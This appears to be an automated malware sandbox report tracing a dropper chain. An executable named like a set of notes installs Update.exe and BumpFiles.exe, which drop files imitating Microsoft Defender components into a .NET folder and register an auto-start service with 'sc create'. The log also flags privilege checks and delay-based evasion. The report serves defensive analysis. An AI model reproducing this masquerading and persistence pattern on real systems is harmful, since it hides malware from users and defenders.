          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0023D603 push ecx; ret 0_2_0023D616
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848E0D2A5 pushad ; iretd 3_2_00007FF848E0D2A6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F200BD pushad ; iretd 3_2_00007FF848F200C1
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0043D0D8 push ecx; mov dword ptr [esp], eax4_2_0043D0D9
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004100B0 push 00410133h; ret 4_2_0041012B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040F344 push ecx; mov dword ptr [esp], edx4_2_0040F345
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_00407320 push ecx; mov dword ptr [esp], eax4_2_00407321
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004245FC push ecx; mov dword ptr [esp], ecx4_2_00424600
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0063586C push 006358B2h; ret 4_2_006358AA
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040F95C push ecx; mov dword ptr [esp], edx4_2_0040F95D
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040F968 push ecx; mov dword ptr [esp], edx4_2_0040F969
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040F974 push ecx; mov dword ptr [esp], edx4_2_0040F975
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040F9E0 push ecx; mov dword ptr [esp], edx4_2_0040F9E1
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040F9BA push ecx; mov dword ptr [esp], edx4_2_0040F9BD
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_00425A54 push ecx; mov dword ptr [esp], ecx4_2_00425A58
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040FA02 push ecx; mov dword ptr [esp], edx4_2_0040FA05
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_00425A18 push ecx; mov dword ptr [esp], ecx4_2_00425A1B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040FAF4 push ecx; mov dword ptr [esp], edx4_2_0040FAF5
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040FB0C push ecx; mov dword ptr [esp], edx4_2_0040FB0D
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004FBC54 push ecx; mov dword ptr [esp], eax4_2_004FBC58
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004D3CB8 push ecx; mov dword ptr [esp], edx4_2_004D3CB9
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0043FCBC push ecx; mov dword ptr [esp], eax4_2_0043FCBD
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004FBF8C push ecx; mov dword ptr [esp], eax4_2_004FBF8E
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0063586C push 006358B2h; ret 7_2_006358AA
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_004FBC54 push ecx; mov dword ptr [esp], eax7_2_004FBC58
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0043D0D8 push ecx; mov dword ptr [esp], eax7_2_0043D0D9
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_004100B0 push 00410133h; ret 7_2_0041012B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040F344 push ecx; mov dword ptr [esp], edx7_2_0040F345
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_00407320 push ecx; mov dword ptr [esp], eax7_2_00407321
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_004245FC push ecx; mov dword ptr [esp], ecx7_2_00424600
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpRtp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\MpSvc.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDetours.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpSvc.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\shellext.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dllJump to dropped file
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\BumpFiles.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpOAV.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpProvider.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCommu.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\NisSrv.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft CorporationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation\Microsoft Malware Protection.lnkJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_005E0E10 IsIconic,4_2_005E0E10
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_005E0E94 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,4_2_005E0E94
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_005E0E10 IsIconic,7_2_005E0E10
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_005E0E94 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,7_2_005E0E94
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain checking for user administrative privileges
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_4-11025
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1360000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1B140000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1108Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1954Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpRtp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dllJump to dropped file
